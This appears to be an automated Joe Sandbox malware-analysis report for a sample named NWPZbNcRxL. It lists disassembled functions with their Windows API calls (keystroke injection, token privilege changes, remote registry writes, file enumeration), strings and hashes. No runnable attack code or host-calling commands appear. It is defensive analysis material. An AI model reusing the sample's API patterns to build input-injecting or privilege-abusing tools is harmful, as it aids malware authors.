Function 00C3525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00C35266

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 09f452629cc55e77dcd581e9b2518bfa190a673cf9f64e3d2c5508c4cb295323
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: F2B0927644020C7BCE012A82EC02A4A3B199B41764F408020FB0C18162A673E664AA89

Function 00C7D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00C7D1FF

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: ecca68ed9b384e67438c305e9995aaca32702a6af7558a6bf6055efca7c4d58f
Instruction ID: 0df7a3575e55acc324194f3975d8980ad96d2a2fc65973d95e9e370d0d008973
Opcode Fuzzy Hash: ecca68ed9b384e67438c305e9995aaca32702a6af7558a6bf6055efca7c4d58f
Instruction Fuzzy Hash: 8C7141306043018FD714EF64C491AAEB7F4AF85314F54856DF89A9B3A2DB30ED46EB52

Function 01027280 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01027291

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: d0d9701c17fe1802e17fabec89fd5bb6a1fb2ef3e284b5bc09d6b17f4a0f963e
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D0E0E67494110DDFDB00EFB4D9496DE7FB4EF04301F100161FD01D2281D6309D508A62

Non-executed Functions

Function 00C9CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C9CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CB95
GetWindowLongW.USER32(?,000000F0), ref: 00C9CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CC00
SendMessageW.USER32 ref: 00C9CC29
_wcsncpy.LIBCMT ref: 00C9CC95
GetKeyState.USER32(00000011), ref: 00C9CCB6
GetKeyState.USER32(00000009), ref: 00C9CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CCD9
GetKeyState.USER32(00000010), ref: 00C9CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CD0C
SendMessageW.USER32 ref: 00C9CD33
SendMessageW.USER32(?,00001030,?,00C9B348), ref: 00C9CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C9CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C9CE60
SetCapture.USER32(?), ref: 00C9CE69
ClientToScreen.USER32(?,?), ref: 00C9CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C9CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C9CEF5
ReleaseCapture.USER32 ref: 00C9CF00
GetCursorPos.USER32(?), ref: 00C9CF3A
ScreenToClient.USER32(?,?), ref: 00C9CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9CFA3
SendMessageW.USER32 ref: 00C9CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D00E
SendMessageW.USER32 ref: 00C9D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C9D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C9D06D
GetCursorPos.USER32(?), ref: 00C9D08D
ScreenToClient.USER32(?,?), ref: 00C9D09A
GetParent.USER32(?), ref: 00C9D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9D123
SendMessageW.USER32 ref: 00C9D154
ClientToScreen.USER32(?,?), ref: 00C9D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C9D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D20C
SendMessageW.USER32 ref: 00C9D22F
ClientToScreen.USER32(?,?), ref: 00C9D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C9D2B5

Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC

GetWindowLongW.USER32(?,000000F0), ref: 00C9D351

Strings

@GUI_DRAGID, xrefs: 00C9CE9C
F, xrefs: 00C9D235

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 242ec7f88829f2d4dfddb0c51ad016edd6c41964f054d48126c707d007da9e7f
Instruction ID: d80700e1270451c32d106ff00ec9ef442d7a25fd949a56f823bf5974c0732737
Opcode Fuzzy Hash: 242ec7f88829f2d4dfddb0c51ad016edd6c41964f054d48126c707d007da9e7f
Instruction Fuzzy Hash: 44428974204281AFDB20CF24C888BAABBE5FF49350F14055EF6A6D72B1C731D951EB52

Function 00C26F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C271C3
_memset.LIBCMT ref: 00C27539
_memmove.LIBCMT ref: 00C276AC

Strings

[:>:]], xrefs: 00C27492
[:<:]], xrefs: 00C27479
Q\E, xrefs: 00C27FCB
\b(?=\w), xrefs: 00C63769
DEFINE, xrefs: 00C62103
\b(?<=\w), xrefs: 00C63773

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
Instruction ID: 3fb9ba030af071a5dcdb016f63b5607a2684a86837d883f94440849b9610ec54
Opcode Fuzzy Hash: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
Instruction Fuzzy Hash: E193BF75E04229DFDB24CF98D8C1BADB7B1FF48310F24816AE955AB281E7709E81DB50

Function 00C148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00C148DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4D665
IsIconic.USER32(?), ref: 00C4D66E
ShowWindow.USER32(?,00000009), ref: 00C4D67B
SetForegroundWindow.USER32(?), ref: 00C4D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4D69B
GetCurrentThreadId.KERNEL32 ref: 00C4D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00C4D6CF
SetForegroundWindow.USER32(?), ref: 00C4D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6E7
keybd_event.USER32(00000012,00000000), ref: 00C4D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6FC
keybd_event.USER32(00000012,00000000), ref: 00C4D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D70A
keybd_event.USER32(00000012,00000000), ref: 00C4D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D719
keybd_event.USER32(00000012,00000000), ref: 00C4D71E
SetForegroundWindow.USER32(?), ref: 00C4D721
AttachThreadInput.USER32(?,?,00000000), ref: 00C4D748

Strings

Shell_TrayWnd, xrefs: 00C4D660

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
Instruction ID: 637dd5f2b0f1fb5717d33f81949e4e4367dd7ee13056f5f412911b798871c5c9
Opcode Fuzzy Hash: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
Instruction Fuzzy Hash: 1A314571A40318BBEB216F619C49F7F7F6CEB44B50F11402AFA05EA1D1C6B05D51AAA1

Function 00C68310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865

_memset.LIBCMT ref: 00C68353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C683A5
CloseHandle.KERNEL32(?), ref: 00C683B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C683CD
GetProcessWindowStation.USER32 ref: 00C683E6
SetProcessWindowStation.USER32(00000000), ref: 00C683F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C6840A

Part of subcall function 00C681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
Part of subcall function 00C681CB: CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2

Strings

, xrefs: 00C68362
default, xrefs: 00C68405
winsta0, xrefs: 00C683C8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 529a597c3eded5adc2d3c297440e300312aab7e94d5232ebf46b7ac3eb070832
Instruction ID: a78d187e49eb4bc22b7acc0cb93f85ca13b1ba189baea2d834f832702a81105d
Opcode Fuzzy Hash: 529a597c3eded5adc2d3c297440e300312aab7e94d5232ebf46b7ac3eb070832
Instruction Fuzzy Hash: AB814071900209AFDF21DFA4DC89BEE7B79FF04304F14426AF925A6161DB318E19EB20

Function 00C7C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C7C78D
FindClose.KERNEL32(00000000), ref: 00C7C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C844
__swprintf.LIBCMT ref: 00C7C890
__swprintf.LIBCMT ref: 00C7C8D3

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

__swprintf.LIBCMT ref: 00C7C927

Part of subcall function 00C33698: __woutput_l.LIBCMT ref: 00C336F1

__swprintf.LIBCMT ref: 00C7C975

Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C33713
Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C3372B

__swprintf.LIBCMT ref: 00C7C9C4
__swprintf.LIBCMT ref: 00C7CA13
__swprintf.LIBCMT ref: 00C7CA62

Strings

%02d, xrefs: 00C7C91B, 00C7C925, 00C7C973, 00C7C9C2, 00C7CA11, 00C7CA60
%4d, xrefs: 00C7C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00C7C88A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
Instruction ID: 12b66028afbc954a169018646fb708e696d260a35c2c9fad8e0f359d6224f6f7
Opcode Fuzzy Hash: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
Instruction Fuzzy Hash: FCA14BB1408245ABC700EFA4C896EEFB7ECFF85700F40492DF595C6191EA30DA49EB62

Function 00C7EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C7EFB6
_wcscmp.LIBCMT ref: 00C7EFCB
_wcscmp.LIBCMT ref: 00C7EFE2
GetFileAttributesW.KERNEL32(?), ref: 00C7EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00C7F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00C7F026
FindClose.KERNEL32(00000000), ref: 00C7F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F04D
_wcscmp.LIBCMT ref: 00C7F074
_wcscmp.LIBCMT ref: 00C7F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F09D
SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F0C5
FindClose.KERNEL32(00000000), ref: 00C7F0D2
FindClose.KERNEL32(00000000), ref: 00C7F0E4

Strings

*.*, xrefs: 00C7F048

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
Instruction ID: b0d100b15f463f1c4a3f769531ec4ad66dc48bce33299448fb6d78026675da53
Opcode Fuzzy Hash: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
Instruction Fuzzy Hash: 0031C3325012186BDB14AFB4DC8DFEE77ACAF48360F14817AE818D21A1DB70DB46DA61

Function 00C90857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C90953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C9F910,00000000,?,00000000,?,?), ref: 00C909C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C90A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C90A92
RegCloseKey.ADVAPI32(?), ref: 00C90DB2
RegCloseKey.ADVAPI32(00000000), ref: 00C90DBF

Strings

REG_QWORD, xrefs: 00C90D00
REG_EXPAND_SZ, xrefs: 00C90A2F
REG_SZ, xrefs: 00C90AD0
REG_BINARY, xrefs: 00C90D4D
REG_MULTI_SZ, xrefs: 00C90B7A
REG_DWORD, xrefs: 00C90C83

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: efd83b0ab5a2789779a838fa46cba6945c93f5824454b0b6278afbdc97b99285
Instruction ID: eebcd1f39f1770776b18693cd4d6bdfa3c63c1eb7e7b24e3a51a839aecf6bb34
Opcode Fuzzy Hash: efd83b0ab5a2789779a838fa46cba6945c93f5824454b0b6278afbdc97b99285
Instruction Fuzzy Hash: CF029E756006019FDB14EF14C895E6AB7E5FF8A710F14855CF89A9B3A2CB30EE41EB81

Function 00C7F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C7F113
_wcscmp.LIBCMT ref: 00C7F128
_wcscmp.LIBCMT ref: 00C7F13F

Part of subcall function 00C74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C743A0

FindNextFileW.KERNEL32(00000000,?), ref: 00C7F16E
FindClose.KERNEL32(00000000), ref: 00C7F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F195
_wcscmp.LIBCMT ref: 00C7F1BC
_wcscmp.LIBCMT ref: 00C7F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F1E5
SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F20D
FindClose.KERNEL32(00000000), ref: 00C7F21A
FindClose.KERNEL32(00000000), ref: 00C7F22C

Strings

*.*, xrefs: 00C7F190

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
Instruction ID: a0fa86ef0fc6ea36a102ea368267b82decd04400b448fd972288f02da7bab3c4
Opcode Fuzzy Hash: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
Instruction Fuzzy Hash: 0D31C536500219ABDB14AFB4EC89FEE77AC9F45360F14817AE818E20A1DB30DF46DA54

Function 00C7A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C7A20F
__swprintf.LIBCMT ref: 00C7A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C7A293
_memset.LIBCMT ref: 00C7A2B2
_wcsncpy.LIBCMT ref: 00C7A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C7A323
CloseHandle.KERNEL32(00000000), ref: 00C7A32E
RemoveDirectoryW.KERNEL32(?), ref: 00C7A337
CloseHandle.KERNEL32(00000000), ref: 00C7A341

Strings

\??\%s, xrefs: 00C7A22B
:, xrefs: 00C7A252
\, xrefs: 00C7A247

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
Instruction ID: 0d268509504b66f407b013a59d2c2a73bc1fce52d43193fcb1052af953302de2
Opcode Fuzzy Hash: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
Instruction Fuzzy Hash: 62319EB1904109ABDB219FA0DC49FEF77BCEF88740F1041BAF919D2161EB7497458B25

Function 00C266E1 Relevance: 19.6, Strings: 15, Instructions: 889COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 00C6112E
CRLF), xrefs: 00C612C1
UTF), xrefs: 00C610FA
BSR_UNICODE), xrefs: 00C61338
CR), xrefs: 00C61287
LIMIT_RECURSION=, xrefs: 00C611FC
LIMIT_MATCH=, xrefs: 00C61170
UTF16), xrefs: 00C610CF
w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C61349
UCP), xrefs: 00C6110D
ANY), xrefs: 00C612DE
NO_START_OPT), xrefs: 00C6114F
LF), xrefs: 00C612A4
ANYCRLF), xrefs: 00C612FB
BSR_ANYCRLF), xrefs: 00C6131E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
